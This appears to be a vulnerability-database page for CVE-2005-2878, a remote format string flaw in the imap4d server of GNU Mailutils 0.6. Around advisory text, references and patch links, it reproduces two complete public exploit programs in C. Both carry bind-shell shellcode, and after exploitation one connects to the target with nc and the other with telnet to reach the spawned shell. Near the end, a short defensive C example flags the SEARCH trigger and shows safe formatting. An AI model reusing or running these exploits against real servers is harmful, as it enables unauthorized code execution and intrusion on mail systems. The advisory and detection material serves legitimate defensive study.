CVE-2005-2878
CVSS 7.5
Published: 2005-09-13 19:03:00
Revised: 2016-10-17 23:31:04

[Original] Format string vulnerability in search.c in the imap4d server in GNU Mailutils 0.6 allows remote authenticated users to execute arbitrary code via format string specifiers in the SEARCH command.


[CNNVD] GNU Mailutils imap4d SEARCH Command Remote Format String Handling Vulnerability (CNNVD-200509-101)

        The GNU mailutils package is a collection of mail utilities, including local and remote mailbox access services. The imap4d server lets remote users retrieve mail over the Internet Message Access Protocol.
        imap4d in GNU mailutils has a format string vulnerability in its handling of the SEARCH command; a remote attacker could exploit it to execute arbitrary commands on the server. The flaw is triggered when the service processes a malicious search command, and successful exploitation requires the attacker to log in to the server with a valid username and password.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2878
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2878
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-101
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112785181316043&w=2
(UNKNOWN)  BUGTRAQ  20050926 FreeBSD GNU Mailutils 0.6 imap4d exploit
http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407
(PATCH)  CONFIRM  http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407
http://www.debian.org/security/2005/dsa-841
(UNKNOWN)  DEBIAN  DSA-841
http://www.gentoo.org/security/en/glsa/glsa-200509-10.xml
(UNKNOWN)  GENTOO  GLSA-200509-10
http://www.idefense.com/application/poi/display?id=303&type=vulnerabilities&flashstatus=true
(VENDOR_ADVISORY)  IDEFENSE  20050909 GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
http://www.rosiello.org/archivio/imap4d_FreeBSD_exploit.c
(UNKNOWN)  MISC  http://www.rosiello.org/archivio/imap4d_FreeBSD_exploit.c
http://www.securityfocus.com/bid/14794
(UNKNOWN)  BID  14794

- Vulnerability information

GNU Mailutils imap4d SEARCH Command Remote Format String Handling Vulnerability
High risk  Format string
2005-09-13 00:00:00 2005-10-20 00:00:00
Remote  

- Advisory and patch

        The vendor has released an upgrade patch that fixes this security issue. The patch can be obtained from:
        http://savannah.gnu.org/patch/download.php?item_id=4407&item_file_id=5160

- Vulnerability information (1209)

GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (EDBID:1209)
linux remote
2005-09-10 Verified
143 Clément Lecigne
/*
 *  GNU Mailutils 0.6 imap4d 'search' format string exploit.
 *  Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
 *
 *  This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
 *
 *  $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
 *  [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
 *  [+] By clem1.
 *  [+] connecting to: 127.0.0.1:143
 *  [+] authentification: completed.
 *  [+] format string: sended
 *  [+] shellcode sended.
 *  [+] Bingo.
 *  
 *  id;      
 *  uid=1000(clem1) gid=1002(mail) groups=0(root)
 *
 *  Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

struct values {
	int offset;
	int IO_file_close;
	int addr;
	char mailbox[32];
} v = {
	11,
	0x40468bc4,
	0x80906e0, //0xaabbccdd
	"inbox"
};

void usage(char *);
void auth(int, char *, char *);
void sendsc(int);
void owned(int, char *);
void fmtbuild(int);

/*
 * s0t4ipv6@Shellcode.com.ar
 * x86 portbind a shell in port 5074
 */
char sc[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40"
	    "\x50\x89\xe1\xb0\x66\xcd\x80\x31"
	    "\xd2\x52\x66\x68\x13\xd2\x43\x66"
	    "\x53\x89\xe1\x6a\x10\x51\x50\x89"
	    "\xe1\xb0\x66\xcd\x80\x40\x89\x44"
	    "\x24\x04\x43\x43\xb0\x66\xcd\x80"
	    "\x83\xc4\x0c\x52\x52\x43\xb0\x66"
	    "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd"
	    "\x80\x41\x80\xf9\x03\x75\xf6\x52"
	    "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
	    "\x62\x69\x89\xe3\x52\x53\x89\xe1"
	    "\xb0\x0b\xcd\x80";

char b[1024];
int i;

int main(int ac, char **av){
	char o, *host, *user, *pass;
	struct hostent *h;
	struct sockaddr_in s;
	int port, fd;
	
	puts("[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.");
	puts("[+] By clem1.");

	if(ac != 9) usage(av[0]);
	
	while((o = getopt(ac,av,"h:p:u:s:")) != EOF) {
		switch (o) {
			case 'h':
				host = optarg;
				break;
			case 'p':
				port = atoi(optarg);
				break;
			case 'u':
				user = optarg;
				break;
			case 's':
				pass = optarg;
				break;
			default:
				usage(av[0]);
				break;
		}
	}
	if((h = gethostbyname(host)) == NULL) {
		herror("[-] gethostbyname()");
		exit(1);
        }
	
	printf("[+] connecting to: %s:%d\n", inet_ntoa(*((struct in_addr *)h->h_addr)), port);

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if(fd == -1){
		perror("[-] socket()");
		exit(1);
	}

	s.sin_family = AF_INET;
	s.sin_port = htons(port);
	s.sin_addr = *((struct in_addr *)h->h_addr);
	bzero(&(s.sin_zero), 8);

	if (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {
		perror("[-] connect()");
		exit(1);
	}

	i = recv(fd, b, 1023, 0);
	b[i] = 0;
	if(strstr(b, "IMAP4rev1") == NULL){
		puts("[-] failled.");
		exit(1);
	}
	/* authentification. */
	auth(fd, user, pass);
	/* build and send evil format string. */
	fmtbuild(fd);
	/* store shellcode in imap4d rwx adresse space. */
	sendsc(fd);
	/* force a call to fclose, uhm no shellcode ;> */
	owned(fd, host);
	return 0;
}

void auth(int fd, char *user, char *pass){
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "1 LOGIN \"%s\" \"%s\"\n", user, pass);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	i = recv(fd, b, 1023, 0);
	b[i] = 0x0;
	if(strstr(b, "Completed") == NULL){
		puts("[-] LOGIN failled.");
		exit(1);
	}
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "2 SELECT \"%s\"\n", v.mailbox);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "Completed") != NULL)
			break;
		if(strstr(b, "Couldn't") != NULL){
			puts("[-] SELECT failled.");
			exit(1);
		}
	}
	puts("[+] authentification: completed.");
	return;
}

void sendsc(int fd){
	memset(b, 0x41, 1024);
	memcpy(b + 900, sc, strlen(sc));
	memcpy(b + 1020, " A\n", 3);
	memcpy(b, "3 LIST ", 7);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "Completed") != NULL)
			break;
		if(strstr(b, "BAD") != NULL){
			puts("[-] LIST failled.");
			exit(1);
		}
	}
	puts("[+] shellcode sended.");
	return;
}

void fmtbuild(int fd){
	unsigned char b0, b1, b2, b3;
	int a1, a2;
	a1 = (v.addr & 0xffff0000) >> 16;
	a2 = (v.addr & 0x0000ffff);
	b0 = (v.IO_file_close >> 24) & 0xff;
	b1 = (v.IO_file_close >> 16) & 0xff;
	b2 = (v.IO_file_close >> 8) & 0xff;
	b3 = (v.IO_file_close) & 0xff;
	snprintf(b, sizeof b,     "3 SEARCH TOPIC "
				  "A" /* pad. */
				  "%c%c%c%c" 
				  "%%.%hdx"
				  "%%%d$hn\n",
				  b3 + 2, b2, b1, b0,
				  a1 - 0x24,
				  v.offset);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "BAD") != NULL)
			break;
	}
	memset(b, 0x0, 1024);
	snprintf(b, sizeof b,     "3 SEARCH TOPIC "
				  "A" /* pad. */
				  "%c%c%c%c" 
				  "%%.%hdx"
				  "%%%d$hn\n",
				  b3, b2, b1, b0,
				  a2 - 0x24,
				  v.offset);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "BAD") != NULL)
			break;
	}
	puts("[+] format string: sended");
	return;
}

void owned(int fd, char *host){
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "3 SUBSCRIBE OWNED\n");
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	puts("[+] Bingo.\n");
	sleep(1);
	execl("/bin/nc", "prout", host, "5074", NULL);
	printf("[-] muh? where is nc?\n[+] A shell is waiting you on %s:5074.\n", host);
	return;	
}

void usage(char *ex){
	printf("usage: %s -h <hostname> -p <port> -u <user> -s <password>\n", ex);
	exit(1);
}

// milw0rm.com [2005-09-10]
		

- Vulnerability information (1234)

GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (fbsd) (EDBID:1234)
bsd remote
2005-09-26 Verified
143 Angelo Rosiello
/*
* Copyright (c) 2005 Rosiello Security
* http://www.rosiello.org
*
* Permission is granted for the redistribution of this software
* electronically. It may not be edited in any way without the express
* written consent of Rosiello Security.
*
* Disclaimer: The author published the information under the condition 
* that is not in the intention of the reader to use them in order to bring 
* to himself or others a profit or to bring to others damage.
*
* --------------------------------------------------------------------------
*
* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
* iDEFENSE Security Advisory 09.09.05
* www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* The GNU mailutils package is a collection of mail-related
* utilities, including local and remote mailbox access services.
* More information is available at the following site:
* http://www.gnu.org/software/mailutils/mailutils.html
*
* This exploit shows the possibility to run arbitrary code
* on FreeBSD machines.
*
* Authors: Johnny Mast and Angelo Rosiello
* e-mails: rave@rosiello.org angelo@rosiello.org
*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>


#define ISIP(m)   (!((int)inet_addr(m) ==-1))
#define clean(x)  memset(x, 0 , sizeof x)

char code[] =
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x31\xc0"    /* xor %eax,%eax */
"\x31\xc0"    /* xor %eax,%eax */
"\x50"    /* push %eax */
"\x31\xc0"    /* xor %eax,%eax */
"\x50"    /* push %eax */
"\xb0\x7e"    /* mov $0x7e,%al */
"\x50"    /* push %eax */
"\xcd\x80"    /* int $0x80 */
"\x31\xc0"    /* xor %eax,%eax */

/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0"                   // xorl    %eax,%eax
"\x31\xdb"                   // xorl    %ebx,%ebx
"\x31\xc9"                   // xorl    %ecx,%ecx
"\x31\xd2"                   // xorl    %edx,%edx
"\xb0\x61"                   // movb    $0x61,%al
"\x51"                       // pushl   %ecx 
"\xb1\x06"                   // movb    $0x6,%cl
"\x51"                       // pushl   %ecx
"\xb1\x01"                   // movb    $0x1,%cl   
"\x51"                       // pushl   %ecx
"\xb1\x02"                   // movb    $0x2,%cl
"\x51"                       // pushl   %ecx
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx
"\xcd\x80"                   // int     $0x80

/* it binds on port 30464 */
/* bind(fd, (struct sockaddr*)&sin, sizeof(sin))  */
"\xb1\x02"                   // movb    $0x2,%cl
"\x31\xc9"                   // xorl    %ecx,%ecx
"\x51"                       // pushl   %ecx
"\x51"                       // pushl   %ecx 
"\x51"                       // pushl   %ecx

/* port = 0x77, change if needed */
"\x80\xc1\x77"               // addb    $0x77,%cl  
"\x66\x51"                   // pushw   %cx
"\xb5\x02"                   // movb    $0x2,%ch
"\x66\x51"                   // pushw   %cx 
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\xb2\x10"                   // movb    $0x10,%dl  
"\x52"                       // pushl   %edx
"\x51"                       // pushl   %ecx
"\x50"                       // pushl   %eax
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx 
"\x89\xc2"                   // movl    %eax,%edx
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x68"                   // movb    $0x68,%al
"\xcd\x80"                   // int     $0x80

/* listen(fd, 1)*/
"\xb3\x01"                   // movb    $0x1,%bl 
"\x53"                       // pushl   %ebx
"\x52"                       // pushl   %edx
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x6a"                   // movb    $0x6a,%al
"\xcd\x80"                   // int     $0x80

/* cli = accept(fd, 0,0) */
"\x31\xc0"                   // xorl    %eax,%eax  
"\x50"                       // pushl   %eax
"\x50"                       // pushl   %eax
"\x52"                       // pushl   %edx
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx
"\x31\xc9"                   // xorl    %ecx,%ecx
"\xb0\x1e"                   // movb    $0x1e,%al   
"\xcd\x80"                   // int     $0x80

/* dup2(cli,0) */
"\x89\xc3"                   // movl    %eax,%ebx
"\x53"                       // pushl   %ebx
"\x51"                       // pushl   %ecx
"\x31\xc0"                   // xorl    %eax,%eax  
"\xb0\x5a"                   // movb    $0x5a,%al
"\xcd\x80"                   // int     $0x80

/* dup2(cli, 1) */
"\x41"                       // inc     %ecx
"\x53"                       // pushl   %ebx
"\x51"                       // pushl   %ecx
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x5a"                   // movb    $0x5a,%al
"\xcd\x80"                   // int     $0x80

/* dup2(cli, 2) */
"\x41"                       // inc     %ecx
"\x53"                       // pushl   %ebx
"\x51"                       // pushl   %ecx 
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x5a"                   // movb    $0x5a,%al
"\xcd\x80"                   // int     $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */
"\x31\xdb"                   // xorl    %ebx,%ebx  
"\x53"                       // pushl   %ebx
"\x68\x6e\x2f\x73\x68"       // pushl   $0x68732f6e
"\x68\x2f\x2f\x62\x69"       // pushl   $0x69622f2f
"\x89\xe3"                   // movl    %esp,%ebx
"\x31\xc0"                   // xorl    %eax,%eax
"\x50"                       // pushl   %eax
"\x54"                       // pushl   %esp
"\x53"                       // pushl   %ebx
"\x50"                       // pushl   %eax
"\xb0\x3b"                   // mov     $0x3b,%al
"\xcd\x80"                   // int     $0x80

/* exit(..)  */
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x01"                   // mobv    $0x1,%al
"\xcd\x80";                  // int     $0x80



void usage( int argc, char **argv )
{
 
  fprintf(stdout, "%s usage:\n\n", argv[0]);
  fprintf(stdout, "\t-h host\n");
  fprintf(stdout, "\t-p port\n");
  fprintf(stdout, "\t-l login\n");
  fprintf(stdout, "\t-a password\n\n");

  return;
}


void send_message( int fd, char *msg, ... )
{
  char string[2000];
  int len;
  size_t size;

  va_list  args;


  clean(string);


  va_start(args, msg);
  len = vsnprintf(string, sizeof(string)-1, msg,args);
  len = (len >=0) ? len : 0;

  /* Terminating the string */
  string[len]='\0';

  write(fd, string, len);

  return;
}





char *buildstring( long r_addr, long target, int offset, int sock )
{
  unsigned char string[512], a[4];
  int len;
  int high, low, arw;



  high = ( target & 0xffff0000 ) >> 16;
  low =  ( target & 0x0000ffff );

  clean(a); 
  a[0] = (r_addr >> 24) & 0xff;
  a[1] = (r_addr >> 16) & 0xff;
  a[2] = (r_addr >> 8) & 0xff;
  a[3] = (r_addr) & 0xff;
  a[4] = '\0';

  clean(string); 
  len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n",
	(int)a[3]+2,a[2],a[1],a[0],
	high -(0x24+13),   	/* Number of bytes for the first write */
	offset	/* The Offset to addr */
        );

  len = (len >=0) ? len : 0;
  string[len] = '\0';
  write(sock, string, len);

  read(sock, string, sizeof(string));


  clean(string);
  len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n",
       (int) a[3], (int)a[2], (int)a[1],(int)a[0],
        low - (0x24 +13),
        offset,          /* The offset to addr +2 */
	code
        );

  len = (len >=0) ? len : 0;
  string[len] = '\0';
  write(sock, string, len);


  return (char *)strdup(string);	
}


void get_addr_as_char( u_int addr, char *buf ) 
{
  *(u_int*)buf = addr;
  if (!buf[0]) buf[0]++;
  if (!buf[1]) buf[1]++;
  if (!buf[2]) buf[2]++;
  if (!buf[3]) buf[3]++;
}

static int got_entry = 0x08057a0c+4;


int comun( char *host, struct sockaddr_in sin4 )
{
  char *a[4] = { "/usr/bin/telnet", host , "30464", NULL };
  execve(a[0],a, NULL);
  return 0;
}

void welcome( )
{
  fprintf( stdout, "\nCopyright (c) 2005 Rosiello Security\n" );
  fprintf( stdout, "http://www.rosiello.org\n" );
  fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" );
}

int main( int argc, char **argv )
{
  struct  hostent    *hp;
  struct sockaddr_in sin4;
  char shellbuf[1030];
  char *host, buffer[512], *ptr, *p, *USER, *PASS;
  int ch, port = 0, sock, offset = 1;
  int login  = 0, i, calc = 0;
  int ret = 0, len  = 0, b;
  int have_shell_loc = 0;
  unsigned int shell_addr = (u_int)0x0806c000;

  welcome( );

  if ( argc < 9 )
  { 
    usage(argc, argv);
    exit(EXIT_SUCCESS);
  }

  if (!(host = malloc (128)))
  {
    fprintf(stderr, "exp.c:115 Could not allocate memory\n");
    exit(EXIT_FAILURE);
  }


  while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF) 
  {
   switch(ch) 
   {
      case 'h':
      host = (char *)strdup(optarg);
      break;

      case 'V':
      break;

      case 'p':
      port =  atoi (optarg);
      break;
 
      case 'l':
      USER = (char *)optarg;
      break;

      case 'a':
      PASS = (char *)optarg;
      break;

      default:
      usage(argc, argv);
      break;
 }	
}


 
  if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  {
    fprintf(stderr, "exp.c:139 Error creating an new socket"); 
    exit(EXIT_FAILURE);
  }

  host = (host) ? host : "localhost";
  port = (port) ? port : 143;

  if (!(ISIP(host)))
  {
     if (!(hp = gethostbyname(host)))
     {
       fprintf(stderr, "exp.c:152 Could not resolve ip address\n");	
       exit(EXIT_FAILURE);
     } 

     memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length);
     host = (char *)strdup(inet_ntoa(sin4.sin_addr)); 
  } else 
    sin4.sin_addr.s_addr = inet_addr(host);

 


  sin4.sin_family = AF_INET;
  sin4.sin_port = (unsigned short)htons( port );

  fprintf(stdout, "[+] Connecting to %s:%d\n", host,port);

  if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0)
  { 
     fprintf(stderr, "[*] exp.c:178 Connection failed\n");
     exit(EXIT_FAILURE);
  }


  fprintf(stdout, "[+] Connected .. \n");
  fprintf(stdout, "[+] Sending login ... \n");

  send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS);
  fprintf(stdout, "[+] Done ... \n");

  while ((read(sock, buffer, 512)) > 0)
  {
    if ( login == 0  && ret == 0)
    switch (buffer[0])
    {

     case '1':
     fprintf(stdout, "[+] Selecting inbox ..\n");
     send_message(sock, "2 Select inbox\n");
     fprintf(stdout, "[+] Selecting Done .. Starting brute sequence\n");
     send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset);
     login = 1;
     break;
    }


    if ((ptr=strstr(buffer, "(near")) && login == 1)
    {
      ptr +=15;
      if ((strncmp(ptr, "41414141",8))!=0) 
      {
        offset ++;
        send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset);
      }
      else 
      {
        fprintf(stdout, "[+] Found offset %d\n", offset);
	fprintf(stdout, "[+] Finding buffer on the stack\n");
	ret = 1;
	login = 0;
        clean(buffer);
      }
    } 

    if ( ret == 1 )
    {
	
      if ((ptr=strstr(buffer, "(near"))) 
      {
        ptr +=6+4 +1; /* +4 for the addr string*/
	/* +1 for the junk char */
	calc = strlen(buffer) - strlen(ptr);
	calc -=6+4+1;	
	
	for (i = 0; i < strlen(buffer); i++) 
        {  
           if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1)
           {
	     shell_addr += i -4;
	     have_shell_loc = 1;
	     sleep(2);
             buildstring(got_entry, shell_addr+=3, offset, sock);
             fprintf(stdout,"[+] Decoy found at %p\n", shell_addr);
       	     close(sock);
	     fprintf(stdout, "[+] Trying to contact the bind shell ..\n");
    	     if((comun(host, sin4)) < 0)
	       fprintf(stderr, "[-] Exploit failed\n");
           } 
           else
             ++ptr;
        } 
      }      
      if( shell_addr > 0xc0000000)
        break;
      shell_addr++;
      ptr = ((char *)&shell_addr);
      ptr[4] = 0;
      if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00) 
      {
        shell_addr ++;
        ptr = ((char *)&shell_addr);
        ptr[4] = 0;
      } 
      while (strlen(ptr) !=4)
      {
        shell_addr++;
        ptr = ((char *)&shell_addr);
        ptr[4] = 0;
      }
      if (have_shell_loc != 1)
      {
        send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code);
      }
    }
    clean(buffer);
  }

  fprintf(stderr, "[+] Closing connection\n");
  close(sock);
  free(host);

  fprintf(stderr, "[-] Exploit failed %p\n", shell_addr);
  return 0;
}

// milw0rm.com [2005-09-26]
		

- Vulnerability information

19306
GNU Mailutils imap4d SEARCH Command Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2005-09-09 2005-08-09
2005-09-11 2005-09-09

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

GNU Mailutils Imap4D Search Command Remote Format String Vulnerability
Input Validation Error 14794
Yes No
2005-09-09 12:00:00 2007-04-24 06:30:00
An anonymous researcher discovered this vulnerability.

- Affected program versions

GNU Mailutils 0.6.1
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
GNU Mailutils 0.6
+ Gentoo Linux

- Vulnerability discussion

The 'imap4d' daemon is prone to a remote format-string vulnerability.

The issue presents itself when the service handles malicious search commands from a client.

A successful attack may allow attackers to execute arbitrary code, which may help them gain unauthorized access or escalate privileges in the context of the server.

This issue has been confirmed in GNU Mailutils 0.6; other versions may be vulnerable as well.

- Exploit

The following search command is sufficient to trigger this issue:

SEARCH TOPIC %s%s%s

Exploit code is available.
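Added example (not part of this CVE record or of GNU Mailutils' own code): a log-filter check that flags the trigger pattern quoted above in IMAP SEARCH traffic, and the reply pattern that avoids this bug class, where untrusted text is passed as an argument to a fixed format string rather than as the format string itself. The IMAP line layout ("<tag> SEARCH ...") and the BAD reply wording are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Count printf-style conversion specifiers in a command argument.
 * A legitimate SEARCH key contains none, so "%s%s%s" (the trigger
 * quoted above) scores 3; "%%" is a literal percent and is ignored. */
int count_format_specifiers(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* escaped percent sign */
            p++;
            continue;
        }
        const char *q = p + 1;
        while (*q && strchr("-+ #0", *q)) q++;                          /* flags */
        while (*q && (isdigit((unsigned char)*q) || *q == '.' || *q == '$')) q++;
        while (*q && strchr("hlLqjzt", *q)) q++;                        /* length */
        if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {                   /* conversion */
            n++;
            p = q;
        }
    }
    return n;
}

/* Log-filter check: does this IMAP line ("<tag> SEARCH ...", an assumed
 * layout) carry format specifiers in its SEARCH argument? */
int is_suspicious_search(const char *line)
{
    const char *sp = strchr(line, ' ');   /* skip the client tag */
    if (!sp)
        return 0;
    while (*sp == ' ')
        sp++;
    if (strncasecmp(sp, "SEARCH", 6) != 0)
        return 0;
    return count_format_specifiers(sp + 6) > 0;
}

/* Safe reply pattern for this bug class: the untrusted key is an argument
 * to a fixed format string, never the format string itself (the vulnerable
 * shape is snprintf(out, n, key)). Reply text is a hypothetical example. */
char reply_buf[128];
int reply_bad_safe(char *out, size_t n, const char *tag, const char *key)
{
    return snprintf(out, n, "%s BAD SEARCH unknown key: %s\r\n", tag, key);
}
```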

- Solution

The vendor has released a patch to address this issue. Please see the references for details.


GNU Mailutils 0.6

GNU Mailutils 0.6.1

- References
